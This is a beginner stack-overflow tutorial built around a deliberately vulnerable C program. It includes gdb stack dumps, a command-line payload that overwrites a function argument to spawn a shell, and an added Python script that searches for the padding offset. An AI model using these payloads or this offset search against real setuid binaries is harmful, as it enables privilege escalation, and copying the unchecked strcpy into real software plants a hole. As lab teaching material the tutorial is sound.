Stack Overflow Beginner Series, Tutorial 2
overflow2.c
#define _GNU_SOURCE          /* glibc only declares setresuid() with this defined */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"      /* helper shipped with the tutorial: prints the stack */

/* Deliberately vulnerable: str is copied into a 64-byte buffer with no length check. */
void vuln(int win, char *str) {
    char buf[64];
    strcpy(buf, str);                                /* the overflow happens here */
    dump_stack((void **) buf, 23, (void **) &win);   /* show the frame from buf up past win */
    printf("win = %d\n", win);
    if (win == 1) {
        execl("/bin/sh", "sh", (char *) NULL);       /* the goal: win starts as 0 and must be overwritten */
    } else {
        printf("Sorry, you lose.\n");
    }
    exit(0);   /* vuln() never returns, so a clobbered return address is never used */
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: stack_overwrite [str]\n");
        return 1;
    }
    uid_t euid = geteuid();
    setresuid(euid, euid, euid);   /* if the binary is setuid, make the real uid match so the shell keeps the privilege */
    vuln(0, argv[1]);              /* win is passed as 0 */
    return 0;
}
dump_stack: prints the stack. Judging from the call above, it is handed the start of buf, a word count, and the address of win, so its output covers the buffer and the frame slots above it, which is exactly the region we are about to overwrite.
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
As you can see, the program is wide open: no stack canary, NX disabled, no PIE. All we have to do is overflow buf until the win argument becomes 1.
Two methods:
Method one:
gdb --args ./overflow2 $(python -c "print 'A'*64+'B'*4")
Debug it under gdb (the argument above is built with Python 2's print statement: 64 A's to fill buf followed by 4 B's so we can see where the buffer ends). Since the source contains an if, we step into vuln and locate the assembly that corresponds to it:
0x8048666 <vuln+62>: mov DWORD PTR [esp],eax
0x8048669 <vuln+65>: call 0x80483f0 <printf@plt>
0x804866e <vuln+70>: mov eax,DWORD PTR [ebp+0x8]
**0x8048671 <vuln+73>: cmp eax,0x1**
0x8048674 <vuln+76>: jne 0x8048694 <vuln+108>
0x8048676 <vuln+78>: mov DWORD PTR [esp+0x8],0x0
So this time the comparison is between the contents at ebp+0x8 and 1. On a 32-bit cdecl frame that is the first argument, win: the saved ebp sits at ebp, the return address at ebp+0x4, and the first argument at ebp+0x8. As in part one of this series, set a breakpoint at the cmp and examine the stack:
gdb-peda$ x/90x 0xffffce20
0xffffce20: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce28: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce30: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce38: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce40: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce48: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce50: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce58: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce60: 0x42 0x42 0x42 0x42 0x00 0xf1 0xea 0xf7
0xffffce68: 0x98 0xce 0xff 0xff 0x0b 0x87 0x04 0x08
0xffffce70: 0x00 0x00 0x00 0x00 0x65 0xd1 0xff 0xff
0xffffce78: 0xe8 0x03
Corresponding screenshot:
ebp+0x8 = 0xffffce70, which is 0x50 bytes past the start of the char array (0xffffce70 - 0xffffce20 = 0x50 = 80). Reading the dump in byte order: the 64 A's fill buf (0xffffce20 to 0xffffce5f), the four B's land immediately after it at 0xffffce60, then come four bytes of something else at 0xffffce64, the saved ebp (0xffffce98) at 0xffffce68, the return address (0x0804870b, back into main) at 0xffffce6c, and finally win itself, still 0x00000000, at 0xffffce70. So we construct:
./overflow2 $(python -c "print 'A'*80+'\x01\x00\x00\x00'")
Two things are worth knowing about why this works. First, the shell cannot put NUL bytes into an argument: command substitution drops them (newer bash versions print a warning), so argv[1] is really 80 A's followed by a single 0x01. strcpy copies those 81 bytes plus its own terminating NUL, which sets the two low bytes of win to 01 00; the two high bytes are untouched but were already 0 because win was passed as 0, so win == 1. Second, the padding also overwrites the saved ebp and the return address with 0x41414141. That is harmless here only because vuln ends with exit(0) and never returns; a function that returned would crash at 0x41414141 instead.
Result image:
In fact the approach in the first two articles of this series is essentially the same.
Method two: the idea is to write an automated script that loops over candidate padding lengths and checks whether the overflow succeeded. The implementation is still a little tricky; I will write it up later.
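As an added example (not part of the original tutorial), here is the automated search that method two describes, combined with the offset arithmetic from method one. It assumes the compiled binary is at ./overflow2 and uses the addresses from the gdb session above; simulate_overflow2 is a constructed stand-in for the binary so the search can be exercised without it. Note how success is detected: when stdout is a pipe, printf's "win = 1" sits in a full buffer that execl() throws away, so the script instead feeds the shell a command and looks for that command's output.

```python
import os
import struct
import subprocess
from typing import Callable, Optional

# Addresses from the gdb session on the page (they will differ on your machine).
BUF_ADDR = 0xffffce20   # start of char buf[64]
WIN_ADDR = 0xffffce70   # ebp+0x8, the stack slot holding the win argument
TARGET = "./overflow2"  # assumed location of the compiled binary
MARKER = b"PWNED"       # printed by the shell we obtain when win == 1


def slot_offset(buf_addr: int, slot_addr: int) -> int:
    """Bytes from the start of buf to the slot to overwrite (0x50 on the page)."""
    if slot_addr < buf_addr:
        raise ValueError("target slot must lie above the buffer")
    return slot_addr - buf_addr


def build_payload(offset: int, value: int = 1) -> bytes:
    """offset bytes of padding, then value as a 32-bit little-endian int.

    Trailing NULs are dropped: the shell cannot pass NUL bytes in argv and
    strcpy stops at the first one anyway. The terminating NUL that strcpy
    appends supplies the next zero byte, and win starts out as 0, so any
    remaining high bytes are already correct. A value with an interior NUL
    cannot be delivered through argv at all, so refuse it.
    """
    payload = (b"A" * offset + struct.pack("<I", value)).rstrip(b"\x00")
    if b"\x00" in payload:
        raise ValueError("value contains an interior NUL; cannot pass via argv")
    return payload


def run_target(payload: bytes) -> bytes:
    """Run the real binary with payload as argv[1] and return its stdout.

    Success shows up as the shell executing our command, not as the string
    "win = 1": with stdout on a pipe that printf output is fully buffered and
    execl() replaces the process image before it is ever flushed.
    """
    proc = subprocess.run([TARGET, payload],
                          input=b"echo " + MARKER + b"\n",
                          capture_output=True, timeout=5)
    return proc.stdout


def find_win_offset(run: Callable[[bytes], bytes],
                    lo: int = 64, hi: int = 128) -> Optional[int]:
    """Method two: try each padding length in [lo, hi) until the shell appears."""
    for offset in range(lo, hi):
        if MARKER in run(build_payload(offset)):
            return offset
    return None


def simulate_overflow2(payload: bytes) -> bytes:
    """Constructed stand-in for ./overflow2 (not the real program): models
    buf[64] at offset 0, win at offset 80, and strcpy's NUL termination."""
    frame = bytearray(84)                            # win == 0 at frame[80:84]
    copied = payload.split(b"\x00", 1)[0] + b"\x00"  # exactly what strcpy writes
    frame[:len(copied)] = copied                     # bytearray grows if the copy runs past 84
    win = struct.unpack_from("<I", frame, 80)[0]
    if win == 1:
        return MARKER + b"\n"                        # sh ran `echo PWNED`
    return b"win = %d\nSorry, you lose.\n" % win


if __name__ == "__main__":
    print("offset from gdb addresses:", slot_offset(BUF_ADDR, WIN_ADDR))
    print("offset found by search (simulated):", find_win_offset(simulate_overflow2))
    if os.path.exists(TARGET):   # only run the real binary if it has been built
        print("offset found by search (real binary):", find_win_offset(run_target))
```

The search is linear in the padding length because a single byte of 0x01 either lands in win's low byte or it does not; with the simulated target it reports 80, matching 0xffffce70 - 0xffffce20. Against the real binary the absolute stack addresses will vary between gdb and a plain run, but the offset is relative to buf and so does not.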
Note: because of differences between operating systems, some addresses may differ; always go by the addresses on your own machine. The related files are available at: file address. Comments welcome!!!